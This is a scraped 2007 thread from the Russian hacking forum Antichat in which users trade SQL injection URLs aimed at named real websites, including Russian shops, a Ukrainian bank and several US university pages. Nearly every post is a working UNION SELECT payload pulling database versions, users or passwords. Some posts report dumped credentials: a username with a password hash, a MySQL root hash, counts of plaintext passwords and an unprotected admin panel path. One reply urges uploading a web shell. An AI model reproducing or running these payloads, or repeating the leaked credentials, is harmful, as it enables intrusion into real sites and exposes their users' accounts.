ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #931  
Старый 12.03.2007, 18:35
Аватар для Grey
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://www.krasota.ru/krasota/news/show.htpl?id=-1+union+select+1,2,3,4,5,concat(database(),char(58),user(),char(58),version()),7,8,9,10,11,12,13/*
Код:
http://www.sibinfo.org/forma.php?classid=-1+union+select+concat(database(),char(58),user(),char(58),version())/*
 
Ответить с цитированием

  #932  
Старый 12.03.2007, 18:45
Аватар для Colkru
Colkru
Участник форума
Регистрация: 13.01.2007
Сообщений: 160
Провел на форуме:
865816

Репутация: 181
Отправить сообщение для Colkru с помощью ICQ
По умолчанию

Цитата:
http://www.livemaster.ru/blogmessage.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,concat(email,char(58),password),17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,3 9,40,41,42+from+users+limit+258,1/*
259 пользователей, пассы в чистом виде.
 
Ответить с цитированием

  #933  
Старый 12.03.2007, 18:59
Аватар для n1†R0x
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

Код:
http://www.fortress.ru/products.php?id=-1+union+select+1,convert(concat(login,0x3a,password)+using+latin1),3,4,5,6,7,8,9,10+from+users+limit+0,1/*
alvisha:62f31c50cb2d36b5e3a7e06a5d43f48a
798 юзеров

когда нашел админку, подумал... нафиг я все это подбирал)
база юзеров, доступ без авторизации
http://www.fortress.ru/admin/users/index.php
остальное: http://www.fortress.ru/admin/
 
Ответить с цитированием

  #934  
Старый 12.03.2007, 19:35
Аватар для Colkru
Colkru
Участник форума
Регистрация: 13.01.2007
Сообщений: 160
Провел на форуме:
865816

Репутация: 181
Отправить сообщение для Colkru с помощью ICQ
По умолчанию

Код:
http://www.zagorod.net/index.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
Код:
http://art.specialradio.ru/index.php?id=-1+union+select+1,version(),3,4,5,6,7,8/*
 
Ответить с цитированием

  #935  
Старый 12.03.2007, 19:38
Аватар для SWAT
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию

ну собствено вот....

http://www.pij.org/details.php?id=-820+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28/*


http://www.onlinenews.com.pk/details.php?id=-85519+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18/*

http://www.hpcalc.org/details.php?id=-3644+union+select+1,password,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29+from+users/*

http://www.debate21.com/comic.php?id=-64+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5+from+mysql.user/*

http://physiology.case.edu/faculty.php?id=-91+union+select+1,password,3,4,5,6,7,8,9+from+mysq l.user/*

http://dma.ucla.edu/people/faculty.php?ID=-16+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16/*

http://wineserver.ucdavis.edu/people/faculty.php?id=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19/*

http://bme.rutgers.edu/faculty.php?id=-55+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat( login,char(58),password),14,15,16,17,18,19,20+from +users/*

http://www.bard.edu/academics/faculty/faculty.php?action=details&id=-217+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22/*

http://las.arts.ubc.ca/las4/faculty.php?facultyid=-115+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*

http://www.clark.edu/news_events/faculty_experts/faculty.php?id=-6+union+select+1,2,3,4,5,6,7,8,9,10,11/*
 
Ответить с цитированием

  #936  
Старый 12.03.2007, 20:18
Аватар для n1†R0x
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

Код:
http://www.de-viz.ru/articles_view.php?articles_id=-1+union+select+1,2,3,concat(user,0x3a,password),5,6,7,8,9+from+mysql.user/*
root:67457e226a1a15bd
mysql-hash

next:

Код:
http://www.masterkit.ru/main/set.php?num=-1+union+select+1,2,3,4,5,concat(name,0x3a,pass),7,8,9,10,11,12,13,14+from+user+limit+0,1/*
122 юзера, пассы чистые

эх)

Последний раз редактировалось n1†R0x; 12.03.2007 в 20:30..
 
Ответить с цитированием

  #937  
Старый 12.03.2007, 20:31
Аватар для Colkru
Colkru
Участник форума
Регистрация: 13.01.2007
Сообщений: 160
Провел на форуме:
865816

Репутация: 181
Отправить сообщение для Colkru с помощью ICQ
По умолчанию

Код:
http://www.dukemednews.duke.edu/gallery/detail.php?id=-1+union+select+concat(user,char(58),password),2+from+mysql.user+limit+0,1/*
Код:
http://dewerelddraaitdoor.vara.nl/jakhalzen.php?id=-1+union+select+1,2,3,version(),5,user(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*
Код:
http://avtosalon.in.ua/salon_view.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
Вот еще несколько)))
 
Ответить с цитированием

  #938  
Старый 12.03.2007, 21:13
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

mpio

Код:
 http://www.mpio.com.ru/goods/product.php?id=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
 
Ответить с цитированием

  #939  
Старый 12.03.2007, 21:19
Аватар для Ksander
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047

Репутация: 930


По умолчанию

www.tas-combank.com.ua


Код:
http://www.tas-combank.com.ua/index.php?cat=8&news=-1+union+select+1,2,3,4,5,6,7,8,9/*
 
Ответить с цитированием

  #940  
Старый 12.03.2007, 21:30
Аватар для ice1k
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию

Цитата:
Сообщение от _Pantera_  
http://www.rozenbaum.ru/faq/index.php?type=2&id=4&id2=-1+union+select+1,2,3,4,5,6,concat(user,char(58),pa ssword),8,9,10,11+from+mysql.user--

http://www.rozenbaum.ru/admin
заливай шелл...^^
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ